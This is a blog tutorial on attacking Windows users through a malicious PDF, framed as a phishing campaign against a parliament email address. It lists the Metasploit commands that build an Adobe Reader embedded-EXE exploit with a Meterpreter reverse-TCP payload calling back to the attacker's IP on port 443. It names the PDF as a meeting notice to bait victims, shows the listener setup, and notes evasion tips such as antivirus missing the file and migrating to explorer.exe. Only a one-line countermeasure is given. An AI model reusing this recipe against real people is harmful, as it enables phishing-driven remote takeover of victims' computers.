Client Side Attack Using Adobe PDF Escape EXE Social Engineering

Client Side Attack Using Adobe PDF Escape EXE Social Engineering

Bookmark

Type : Tutorial

Level : Medium, Hard

Testing Platform : Win XP SP3, Windows 7

Vulnerable Application Testing : Adobe Reader 9.1

There are some people says that the weakest security to breach was the human itself. I didn't say it was WRONG, because in fact yes it was the weakest, but I also cannot say TRUE, because sometimes the human didn't know what they are doing because no one told them before ๐Ÿ™‚ .

In this tutorial I will give a demonstration how to attack client side using Adobe PDF Escape EXE vulnerability. Almost 95%(maybe) Windows users have Adobe Acrobat (Acrobat Reader) application in their computer or laptops.

If you watching or reading news a few weeks ago about Australia parliament computer has compromised by unknown hacker, actually the hacker do some social engineering technique to gain a privilege to Australian parliament computer and it was almost the same method use in this tutorial.

Okay, here's the scenario of this attack method :

1. The parliament have an email address let's says (parliament@vishnuvalentino.com) — usually this type of people (maybe about 80%) only know how to use computer without knowing the risk about it… if there's any problem, they will call IT support to fix the mess ๐Ÿ™‚ .

In this scenario, the attacker(Me) will attack using Computer Based Social Engineering. After a few times visiting facebook, Google, and also dumpster diving around the parliament office finally this attacker collecting a few parliament e-mail address lists.

Requirement :

1. Metasploit Framework

2. Windows or Linux OS(I'm using Backtrack 5 in this tutorial)

Step By Step Client Side Attack Using Adobe PDF Escape EXE Social Engineering:

1. The first step, I will create a malicious PDF to use in this attack by using vulnerability in Adobe Reader : Adobe PDF Escape Exe Social Engineering No Javascript.

Client Side Attack Using Adobe PDF Embed EXE Social Engineering

Legends:

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs --> Use adobe pdf embedded exe exploit

set payload windows/meterpreter/reverse_tcp --> Set the payload to return meterpreter script when exploit successfully performed

set filename Important_Meeting_Notice.pdf --> Make this file as interesting as you can so the victim will open your malicious PDF

set lhost 192.168.8.92 --> Attacker IP address(change with your IP)

set lport 443 --> I'm using this port to prevent victim proxy blocked the traffic(443 is always open :p )

exploit --> generate the malicious PDF

After we successfully generate the malicious PDF, it will stored on your local computer. I've highlight it using yellow marker, check the directory containing malicious PDF file.

2. The next step is sending our malicious code to target e-mail. In this case I will send it to parliament@vishnuvalentino.com (see our scenario if you still asking why).

Client Side Attack Using Adobe PDF Embed EXE Social Engineering

3. After sending our malicious PDF files, we need to set up a listener to capture this reverse connection. We will use msfconsole to set up our multi handler listener.

Client Side Attack Using Adobe PDF Embed EXE Social Engineering

4. The victim(parliament@vishnuvalentino.com) opened the e-mail and then scan using their antivirus.

Client Side Attack Using Adobe PDF Embed EXE Social Engineering

Client Side Attack Using Adobe PDF Embed EXE Social Engineering

Antivirus find nothing.

5. After the victim open our malicious PDF file there's an alert box guide victim to tick the "do not show this message again" and click open.

Client Side Attack Using Adobe PDF Embed EXE Social Engineering

6. After the victim click open button, our listener start capture reverse connection.

Client Side Attack Using Adobe PDF Embed EXE Social Engineering

Yep we're in! ๐Ÿ™‚

Notes :

– After successfully perform this attack, try to migrate process to Explorer.exe (see tutorial here on step 2 and 3).

Countermeasure :

1. When you open some files and there's an aleart appears, read the alert carefully. Sometimes when you click "Next" or "OK" when alert appears is not a good idea ๐Ÿ˜›

Hope you enjoyed it! ๐Ÿ™‚

Share this article if you found it was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com